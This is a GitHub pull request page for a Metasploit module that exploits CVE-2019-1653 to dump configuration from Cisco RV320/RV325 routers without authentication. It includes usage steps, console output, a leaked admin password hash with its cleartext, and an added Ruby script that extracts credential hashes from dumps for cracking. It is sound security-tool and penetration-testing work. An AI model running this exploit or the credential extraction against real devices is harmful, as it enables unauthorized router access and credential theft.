Module to dump configuration of the Cisco RV320/RV325 #11366

Merged
17 commits merged into rapid7:master from asoto-r7:cisco-rv320-config on Feb 7, 2019

asoto-r7 commented Feb 6, 2019

CVE-2019-1653 (aka Cisco Bugtracker ID CSCvg85922) is an unauthenticated disclosure of device configuration information for the Cisco RV320/RV325 small business router. The vulnerability was responsibly disclosed by RedTeam Pentesting GmbH.

An exposed remote administration interface would allow an attacker to retrieve password hashes and other sensitive device configuration information. On versions 1.4.2.15 and 1.4.2.17, TCP port 443 is accessible on the LAN, and if remote administration is enabled, also on the WAN interface.

In addition, version 1.4.2.15 listens on the WAN interface on TCP port 8007 by default. Version 1.4.2.17 does not listen on port 8007.

Context is available from our recent blog post.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use auxiliary/gather/cisco/cisco_rv320_config
  • set RHOSTS 192.168.1.1 (default LAN IP) or to the WAN interface
  • run
  • Confirm the following output is similar to:
[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
  • Confirm that the hosts, creds, and loot command return the collected information correctly.
  • Confirm that the cited file contains approximately 128k of ASCII text, for example:
####sysconfig####
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
VENDORCODE=ls
  [ ... snip ... ]
password $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/
user-group Default
timeout 10
user-type admin
expiry-date 
ui-theme default
block-login false
block-wan-login false
admit-using-clientcert false
admit-address false
admit-useragent false
exit
end
####end####
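As an added example for this page (not code from the Metasploit module or from Rapid7), the following Ruby script parses a dump in the format shown above and pulls out what a tester wants first: the [VERSION] fields that identify the firmware and model, and the admin credential hash that the module files as a "Nonreplayable hash" cred. The sample input is constructed from the excerpt in the PR description; the [SYSTEM] section, the HOSTNAME key and the user-name line are assumed for illustration and are not taken from the page.

```ruby
# Added example, not the cisco_rv320_config module's own code.
# Parses a Cisco RV320/RV325 config dump (format as shown in the PR) and
# extracts firmware/model fields plus credential hashes.

# Constructed sample modelled on the PR excerpt. The [SYSTEM] section,
# HOSTNAME and user-name lines are assumed for illustration; the hash is the
# one the author posted (cleartext "cisco", per the author). A single-quoted
# heredoc is used so the $1$ in the hash is never interpolated.
SAMPLE_CONFIG = <<~'CFG'
  ####sysconfig####
  [VERSION]
  VERSION=73
  MODEL=RV320
  SSL=0
  IPSEC=0
  PPTP=0
  PLATFORMCODE=RV0XX
  VENDORCODE=ls
  [SYSTEM]
  HOSTNAME=router94e720
  user-name cisco
  password $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/
  user-group Default
  timeout 10
  user-type admin
  expiry-date
  ui-theme default
  block-login false
  block-wan-login false
  exit
  end
  ####end####
CFG

# crypt(3)-style prefixes; $1$ (md5crypt) is what the RV320 dump shows.
HASH_TYPES = { '$1$' => 'md5crypt', '$5$' => 'sha256crypt', '$6$' => 'sha512crypt' }.freeze

def hash_type(hash)
  HASH_TYPES.fetch(hash[/\A\$[^$]+\$/], 'unknown')
end

# Returns { sections: { 'VERSION' => { 'MODEL' => 'RV320', ... }, ... },
#           users: [{ name:, hash:, type: }, ...] }
def parse_rv_config(text)
  result = { sections: {}, users: [] }
  section = nil
  user = nil

  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?('####')        # dump delimiters

    if (m = line.match(/\A\[(\w+)\]\z/))                     # [SECTION]
      section = m[1]
      result[:sections][section] ||= {}
    elsif (m = line.match(/\A([A-Z][A-Z0-9_]*)=(.*)\z/))     # KEY=VALUE
      section ||= 'GLOBAL'
      (result[:sections][section] ||= {})[m[1]] = m[2]
    elsif (m = line.match(/\Auser-name\s+(\S+)\z/))          # start of a user block
      user = { name: m[1], hash: nil, type: nil }
      result[:users] << user
    elsif (m = line.match(/\Apassword\s+(\S+)\z/))           # hash line
      unless user                                            # hash seen without a user-name
        user = { name: nil, hash: nil, type: nil }
        result[:users] << user
      end
      user[:hash] = m[1]
    elsif (m = line.match(/\Auser-type\s+(\S+)\z/)) && user
      user[:type] = m[1]
    elsif line == 'exit'                                     # end of a user block
      user = nil
    end
  end
  result
end

# Credential records in the shape the Metasploit creds table reports.
def credentials(parsed)
  parsed[:users].select { |u| u[:hash] }.map do |u|
    { public: u[:name], private: u[:hash],
      private_type: 'Nonreplayable hash', hash_type: hash_type(u[:hash]) }
  end
end

if __FILE__ == $PROGRAM_NAME
  parsed = parse_rv_config(SAMPLE_CONFIG)
  ver = parsed[:sections]['VERSION']
  puts "Model #{ver['MODEL']} (config version #{ver['VERSION']})"
  credentials(parsed).each do |c|
    puts "#{c[:public]}:#{c[:private]} (#{c[:hash_type]}, #{c[:private_type]})"
  end
end
```

Run it against a loot file from the module (`ruby parse_rv_config.rb`, after replacing SAMPLE_CONFIG with `File.read(path)`) to get a quick inventory before handing the $1$ hash to a cracker; the parser tolerates CRLF line endings and a password line that is not preceded by a user-name.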
asoto-r7 commented Feb 6, 2019

Also works on 1.4.21.15:

msf5 auxiliary(gather/cisco/cisco_rv320_config) > run

[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206174849_default_192.168.1.1_cisco.rv.config_426861.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
asoto-r7 commented Feb 7, 2019

I've added database functionality:

msf5 auxiliary(gather/cisco/cisco_rv320_config) > hosts

Hosts
=====

address      mac                name          os_name  os_flavor  os_sp  purpose  info  comments
-------      ---                ----          -------  ---------  -----  -------  ----  --------
192.168.1.1  70:E4:22:94:E7:20  router94e720                                            

msf5 auxiliary(gather/cisco/cisco_rv320_config) > creds
Credentials
===========

host         origin       service          public  private                            realm  private_type
----         ------       -------          ------  -------                            -----  ------------
192.168.1.1  192.168.1.1  443/tcp (https)  cisco   $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/         Nonreplayable hash

msf5 auxiliary(gather/cisco/cisco_rv320_config) > loot

Loot
====

host         service  type             name  content     info  path
----         -------  ----             ----  -------     ----  ----
192.168.1.1           cisco.rv.config        text/plain        /home/administrator/.msf4/loot/20190206174849_default_192.168.1.1_cisco.rv.config_426861.txt

To save you the trouble of cracking my password hash, it's cisco. :-P

asoto-r7 added some commits Feb 7, 2019

asoto-r7 commented Feb 7, 2019

Firmware version 1.4.2.15 listens on tcp/8007 via the WAN port. The module has been tested against that setup and works!

@asoto-r7 asoto-r7 added docs and removed needs-docs labels Feb 7, 2019

@wvu-r7 wvu-r7 self-assigned this Feb 7, 2019

@asoto-r7 asoto-r7 removed the delayed label Feb 7, 2019

asoto-r7 commented Feb 7, 2019

Thanks to @bcoles, @h00die, and especially @wvu-r7 for the exhaustive code review. 😄

@wvu-r7 wvu-r7 merged commit 0f3a2c1 into rapid7:master Feb 7, 2019

1 of 3 checks passed

  • Metasploit Automation - Sanity Test Execution: Build triggered for merge commit.
  • continuous-integration/travis-ci/pr: The Travis CI build is in progress
  • Metasploit Automation - Test Execution: Successfully completed all tests.

wvu-r7 added a commit that referenced this pull request Feb 7, 2019

wvu-r7 commented Feb 7, 2019

Release Notes

The auxiliary/gather/cisco_rv320_config module has been added to the framework. This module can be used to dump the configuration from vulnerable Cisco RV320/RV325 routers.

@asoto-r7 asoto-r7 deleted the asoto-r7:cisco-rv320-config branch Feb 7, 2019

jmartin-r7 added a commit that referenced this pull request Feb 7, 2019
